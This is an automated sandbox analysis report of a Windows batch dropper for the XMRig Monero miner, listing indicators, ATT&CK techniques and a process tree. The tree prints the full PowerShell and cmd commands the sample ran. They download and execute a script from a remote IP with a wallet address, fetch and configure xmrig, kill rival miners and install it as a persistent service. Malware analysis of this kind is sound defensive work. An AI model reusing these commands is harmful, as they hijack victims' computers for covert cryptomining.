xmrig | 1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad

Analysis

max time kernel
144s
max time network
138s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
01/07/2024, 09:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

267422042222622.bat
Size

521B
MD5

e7bb44f7a40faf04de6eef414aeaac68
SHA1

feab06aa47a6b34a30085726103a58ea2d6ccf77
SHA256

1581804de8f5a5e4d6e0c0a6df326992b874d4d55c4c4d5e795c80f6f1c4c0ad
SHA512

3553e5a1fa4349a75aa0a4a61c833be8ae9d6fa10b3c4da49771e845938585fbd376277f976ff24ad91439be1f32d11ce6270761d7851a959903a6be575a0009

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.177.244.107:3000/miner

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ab66-133.dat	family_xmrig
behavioral1/files/0x000700000001ab66-133.dat	xmrig
behavioral1/memory/1468-136-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2372-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
1	688	powershell.exe
4	888	powershell.exe
7	4392	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1468	xmrig.exe
3612	nssm.exe
4420	nssm.exe
4068	nssm.exe
60	nssm.exe
2404	nssm.exe
2116	nssm.exe
2784	nssm.exe
2372	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
7	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4832	sc.exe
3800	sc.exe
4604	sc.exe
32	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3164	powershell.exe
2332	powershell.exe
4948	powershell.exe
2872	powershell.exe
888	powershell.exe
5020	powershell.exe
3176	powershell.exe
4392	powershell.exe
3032	powershell.exe
3816	powershell.exe
1712	powershell.exe
688	powershell.exe
2628	powershell.exe

Delays execution with timeout.exe 47 IoCs

evasion

pid	Process
4636	timeout.exe
1508	timeout.exe
3696	timeout.exe
2968	timeout.exe
4120	timeout.exe
4192	timeout.exe
2128	timeout.exe
5012	timeout.exe
3172	timeout.exe
5024	timeout.exe
4160	timeout.exe
2052	timeout.exe
2308	timeout.exe
2964	timeout.exe
4556	timeout.exe
4984	timeout.exe
1368	timeout.exe
2500	timeout.exe
4156	timeout.exe
3644	timeout.exe
2752	timeout.exe
3832	timeout.exe
3004	timeout.exe
3276	timeout.exe
4480	timeout.exe
2116	timeout.exe
4612	timeout.exe
3332	timeout.exe
1580	timeout.exe
4536	timeout.exe
2756	timeout.exe
4116	timeout.exe
1944	timeout.exe
516	timeout.exe
4832	timeout.exe
3648	timeout.exe
5000	timeout.exe
3884	timeout.exe
4632	timeout.exe
4832	timeout.exe
3644	timeout.exe
1704	timeout.exe
2904	timeout.exe
3816	timeout.exe
2976	timeout.exe
2496	timeout.exe
4372	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
832	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
688	powershell.exe
688	powershell.exe
688	powershell.exe
888	powershell.exe
888	powershell.exe
888	powershell.exe
2628	powershell.exe
2628	powershell.exe
2628	powershell.exe
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
2332	powershell.exe
2332	powershell.exe
2332	powershell.exe
3816	powershell.exe
3816	powershell.exe
3816	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
1712	powershell.exe
1712	powershell.exe
1712	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
4948	powershell.exe
4948	powershell.exe
4948	powershell.exe
3164	powershell.exe
3164	powershell.exe
3164	powershell.exe
4392	powershell.exe
4392	powershell.exe
4392	powershell.exe
2872	powershell.exe
2872	powershell.exe
2872	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	688	powershell.exe
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	3176	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeLockMemoryPrivilege	2372	xmrig.exe
Token: SeIncreaseQuotaPrivilege	300	WMIC.exe
Token: SeSecurityPrivilege	300	WMIC.exe
Token: SeTakeOwnershipPrivilege	300	WMIC.exe
Token: SeLoadDriverPrivilege	300	WMIC.exe
Token: SeSystemProfilePrivilege	300	WMIC.exe
Token: SeSystemtimePrivilege	300	WMIC.exe
Token: SeProfSingleProcessPrivilege	300	WMIC.exe
Token: SeIncBasePriorityPrivilege	300	WMIC.exe
Token: SeCreatePagefilePrivilege	300	WMIC.exe
Token: SeBackupPrivilege	300	WMIC.exe
Token: SeRestorePrivilege	300	WMIC.exe
Token: SeShutdownPrivilege	300	WMIC.exe
Token: SeDebugPrivilege	300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	300	WMIC.exe
Token: SeRemoteShutdownPrivilege	300	WMIC.exe
Token: SeUndockPrivilege	300	WMIC.exe
Token: SeManageVolumePrivilege	300	WMIC.exe
Token: 33	300	WMIC.exe
Token: 34	300	WMIC.exe
Token: 35	300	WMIC.exe
Token: 36	300	WMIC.exe
Token: SeIncreaseQuotaPrivilege	300	WMIC.exe
Token: SeSecurityPrivilege	300	WMIC.exe
Token: SeTakeOwnershipPrivilege	300	WMIC.exe
Token: SeLoadDriverPrivilege	300	WMIC.exe
Token: SeSystemProfilePrivilege	300	WMIC.exe
Token: SeSystemtimePrivilege	300	WMIC.exe
Token: SeProfSingleProcessPrivilege	300	WMIC.exe
Token: SeIncBasePriorityPrivilege	300	WMIC.exe
Token: SeCreatePagefilePrivilege	300	WMIC.exe
Token: SeBackupPrivilege	300	WMIC.exe
Token: SeRestorePrivilege	300	WMIC.exe
Token: SeShutdownPrivilege	300	WMIC.exe
Token: SeDebugPrivilege	300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	300	WMIC.exe
Token: SeRemoteShutdownPrivilege	300	WMIC.exe
Token: SeUndockPrivilege	300	WMIC.exe
Token: SeManageVolumePrivilege	300	WMIC.exe
Token: 33	300	WMIC.exe
Token: 34	300	WMIC.exe
Token: 35	300	WMIC.exe
Token: 36	300	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2372	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 688	4260	cmd.exe	72
PID 4260 wrote to memory of 688	4260	cmd.exe	72
PID 688 wrote to memory of 4112	688	powershell.exe	73
PID 688 wrote to memory of 4112	688	powershell.exe	73
PID 4112 wrote to memory of 2116	4112	cmd.exe	74
PID 4112 wrote to memory of 2116	4112	cmd.exe	74
PID 2116 wrote to memory of 3948	2116	net.exe	75
PID 2116 wrote to memory of 3948	2116	net.exe	75
PID 4112 wrote to memory of 2728	4112	cmd.exe	76
PID 4112 wrote to memory of 2728	4112	cmd.exe	76
PID 4112 wrote to memory of 4200	4112	cmd.exe	77
PID 4112 wrote to memory of 4200	4112	cmd.exe	77
PID 4112 wrote to memory of 4988	4112	cmd.exe	78
PID 4112 wrote to memory of 4988	4112	cmd.exe	78
PID 4112 wrote to memory of 4304	4112	cmd.exe	79
PID 4112 wrote to memory of 4304	4112	cmd.exe	79
PID 4112 wrote to memory of 3832	4112	cmd.exe	80
PID 4112 wrote to memory of 3832	4112	cmd.exe	80
PID 4112 wrote to memory of 32	4112	cmd.exe	81
PID 4112 wrote to memory of 32	4112	cmd.exe	81
PID 4112 wrote to memory of 4832	4112	cmd.exe	82
PID 4112 wrote to memory of 4832	4112	cmd.exe	82
PID 4112 wrote to memory of 832	4112	cmd.exe	83
PID 4112 wrote to memory of 832	4112	cmd.exe	83
PID 4112 wrote to memory of 888	4112	cmd.exe	85
PID 4112 wrote to memory of 888	4112	cmd.exe	85
PID 4112 wrote to memory of 2628	4112	cmd.exe	86
PID 4112 wrote to memory of 2628	4112	cmd.exe	86
PID 4112 wrote to memory of 3032	4112	cmd.exe	87
PID 4112 wrote to memory of 3032	4112	cmd.exe	87
PID 4112 wrote to memory of 1468	4112	cmd.exe	88
PID 4112 wrote to memory of 1468	4112	cmd.exe	88
PID 4112 wrote to memory of 2884	4112	cmd.exe	89
PID 4112 wrote to memory of 2884	4112	cmd.exe	89
PID 2884 wrote to memory of 2332	2884	cmd.exe	90
PID 2884 wrote to memory of 2332	2884	cmd.exe	90
PID 2332 wrote to memory of 3768	2332	powershell.exe	91
PID 2332 wrote to memory of 3768	2332	powershell.exe	91
PID 4112 wrote to memory of 3816	4112	cmd.exe	92
PID 4112 wrote to memory of 3816	4112	cmd.exe	92
PID 4112 wrote to memory of 3176	4112	cmd.exe	93
PID 4112 wrote to memory of 3176	4112	cmd.exe	93
PID 4112 wrote to memory of 1712	4112	cmd.exe	94
PID 4112 wrote to memory of 1712	4112	cmd.exe	94
PID 4112 wrote to memory of 5020	4112	cmd.exe	95
PID 4112 wrote to memory of 5020	4112	cmd.exe	95
PID 4112 wrote to memory of 4948	4112	cmd.exe	96
PID 4112 wrote to memory of 4948	4112	cmd.exe	96
PID 4112 wrote to memory of 3164	4112	cmd.exe	97
PID 4112 wrote to memory of 3164	4112	cmd.exe	97
PID 4112 wrote to memory of 4392	4112	cmd.exe	98
PID 4112 wrote to memory of 4392	4112	cmd.exe	98
PID 4112 wrote to memory of 2872	4112	cmd.exe	99
PID 4112 wrote to memory of 2872	4112	cmd.exe	99
PID 4112 wrote to memory of 3800	4112	cmd.exe	100
PID 4112 wrote to memory of 3800	4112	cmd.exe	100
PID 4112 wrote to memory of 4604	4112	cmd.exe	101
PID 4112 wrote to memory of 4604	4112	cmd.exe	101
PID 4112 wrote to memory of 3612	4112	cmd.exe	102
PID 4112 wrote to memory of 3612	4112	cmd.exe	102
PID 4112 wrote to memory of 4420	4112	cmd.exe	103
PID 4112 wrote to memory of 4420	4112	cmd.exe	103
PID 4112 wrote to memory of 4068	4112	cmd.exe	104
PID 4112 wrote to memory of 4068	4112	cmd.exe	104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\267422042222622.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://94.177.244.107:3000/miner', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD830.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2116
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3948
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:2728
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4200
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4988
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:4304
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3832
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:32
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3032
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2332
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:3768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gkutwgdf\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2872
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3800
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:3612
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:4420
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4068
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:60
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2404
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:60
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4488
